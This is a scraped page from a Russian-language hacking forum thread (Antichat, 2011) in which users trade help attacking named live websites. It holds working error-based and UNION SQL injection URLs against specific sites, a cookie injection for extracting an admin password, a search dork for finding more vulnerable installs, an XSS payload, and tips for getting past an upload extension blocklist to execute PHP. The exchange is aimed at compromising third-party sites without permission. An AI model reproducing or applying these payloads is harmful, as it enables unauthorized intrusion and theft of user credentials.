HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #17311  
Старый 14.06.2011, 21:34
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами: 8462565

Репутация: 0
По умолчанию

Цитата:
Сообщение от qaz  
Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692
сам не смог ничего сделать, пробовалв sqlhelper'e он тоже ничего не сделал кроме того что определил что это sql union inj

И у меня есть пару вопросов

есть сайт, просканил директории нашол файл .bash_history

открыл его там такое:

Код:
crontab -e
svs@a18-swforum ~ $ crontab -e
crontabs/svs: Permission denied
ls -la
ps aux
ps aux
ps aux
ps aux
ps aux
crontab -e
man crontab
exit
что это? И если на сайте отображается код JS ну например открываю ссылку site.com/pngfix.js оно мне выдает код скрипта, это нормально?

и последнее:

перебираю страницы на сайте и наткнулся на такое:

http://site.com/?id=7 страница выдала

Код:
can't select db: Could not locate entry in sysdatabases for database 'название базы'. No entry found with that name. Make sure that the name is entered correctly.
сканил сайт сканером WVS он выдал что здесь http://forum.shock-world.com/journal.php?"onmouseover=prompt(987671)>

XSS но я в них мало шарю, что с нее выжать можно?

вобщем есть за что хвататься?
 
Ответить с цитированием

  #17312  
Старый 15.06.2011, 07:23
freezed
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами: 8268086

Репутация: 7
По умолчанию

Цитата:
Сообщение от FlaktW  
В чем причина?
Так выводится:
http://www.liftnn.ru/page.php?path=0.25)+or+(SeLect+count(*)+from+(sele ct+1+UnIoN+select+2+UnIoN+select+3)x%20+group+by+c oncat(version(),floor(rand(0)*2)))%23
Duplicate entry '5.1.41-log1' for key 'group_key'
а, так нет:
http://www.liftnn.ru/page.php?path=0.25)+or+1+group+by+concat((select+/*!table_name*/+/*!from*/+/*!information_schema*/./*!tables*/+/*!limit*/+0,1),floor(rand(0)*2))/*!having*/+count(*)+or+1%23
http://www.liftnn.ru/page.php?path=0.25

там точка используется для разбиения переданного параметра, поэтому второй запрос и не работает

http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+ from+pages+limit+0,1),floor(rand(0)*2))having+min( 0)+or+1%23 работает

http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+ from+sttsnn_lift2.pages+limit+0,1),floor(rand(0)*2 ))having+min(0)+or+1%23 не работает, т.к. точкой разбили запрос

бруть таблицы либо ищи способ обойтись без точки
 
Ответить с цитированием

  #17313  
Старый 15.06.2011, 12:40
Optik-Crack
Новичок
Регистрация: 14.06.2011
Сообщений: 19
С нами: 7849046

Репутация: 0
По умолчанию

Бывают 2 вида скуль инъекции это обычные и слепые, но все они находятся по разному, киньте ссылки на статьи к способам их нахождения.
 
Ответить с цитированием

  #17314  
Старый 15.06.2011, 12:47
ubi
Новичок
Регистрация: 25.12.2009
Сообщений: 18
С нами: 8620247

Репутация: 0
По умолчанию

Цитата:
Сообщение от Optik-Crack  
Бывают 2 вида скуль инъекции это обычные и слепые, но все они находятся по разному, киньте ссылки на статьи к способам их нахождения.
SQL injection полный FAQ [Dr.Z3r0]

SQL инъекция (в т.ч. и blind SQL) [kot777]

Быстрый Blind SQL Injection [Qwazar]

А поиск для чего??
 
Ответить с цитированием

  #17315  
Старый 15.06.2011, 17:59
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию

Цитата:
Сообщение от Seravin  
url decode сделал хотя бы...
а вообще предположу что надо либо group_concat либо limit использовать
пробовал group_concat либо limit не выводит ничего
 
Ответить с цитированием

  #17316  
Старый 15.06.2011, 22:31
freezed
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами: 8268086

Репутация: 7
По умолчанию

есть уязвимый сервер, могу заливать все типы файлов кроме:

$Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc', 'pl','bat','exe','dll','reg') ;

пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются

сервер под nginx, поэтому htaccess не пойдет

lfi не нашел

что можно еще поробовать?
 
Ответить с цитированием

  #17317  
Старый 15.06.2011, 23:01
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами: 9128075

Репутация: 3
По умолчанию

кусок уязвимого кода

Цитата:
Сообщение от None  
";
echo $row["username"];
echo "";
echo $row["visits"];
echo "";
}
echo "";
?>
структура таблицы

Цитата:
Сообщение от None  
CREATE TABLE `tb_users` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(15) NOT NULL,
`password` varchar(100) NOT NULL,
`ip` varchar(15) NOT NULL,
`email` varchar(150) NOT NULL,
`pemail` varchar(150) NOT NULL,
`referer` varchar(15) NOT NULL,
`country` varchar(150) NOT NULL,
`visits` varchar(150) NOT NULL default '0',
`referals` varchar(150) NOT NULL default '0',
`referalvisits` varchar(150) NOT NULL default '0',
`money` varchar(150) NOT NULL default '0.00',
`paid` varchar(150) NOT NULL default '0.00',
`joindate` varchar(150) NOT NULL,
`lastlogdate` varchar(150) NOT NULL,
`lastiplog` varchar(150) NOT NULL,
`account` varchar(150) NOT NULL,
`user_status` varchar(15) NOT NULL default 'user',
KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=20 ;
чему должна быть равна переменная $lole для вывода password where username admin?
 
Ответить с цитированием

  #17318  
Старый 15.06.2011, 23:18
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от vaddd  
кусок уязвимого кода
структура таблицы
чему должна быть равна переменная $lole для вывода password where username admin?
Должно быть mq = off;

Попробуй

Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1

Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).
 
Ответить с цитированием

  #17319  
Старый 15.06.2011, 23:24
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами: 9128075

Репутация: 3
По умолчанию

Цитата:
Сообщение от Фараон  
Должно быть mq = off;
Попробуй
Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1
Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).
inurl:advertisewmz.php

уязвимый сценарий referals.php, он в той же папке

спасибо за ответ, попробую завтра

принтабельные цифры будут 2,9?
 
Ответить с цитированием

  #17320  
Старый 15.06.2011, 23:26
ubi
Новичок
Регистрация: 25.12.2009
Сообщений: 18
С нами: 8620247

Репутация: 0
По умолчанию

Цитата:
Сообщение от freezed  
есть уязвимый сервер, могу заливать все типы файлов кроме:
$Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc', 'pl','bat','exe','dll','reg') ;
пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются
сервер под nginx, поэтому htaccess не пойдет
lfi не нашел
что можно еще поробовать?
Попробуй что нибудь из этого

Минифак по загрузке php кода вместо картинок
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.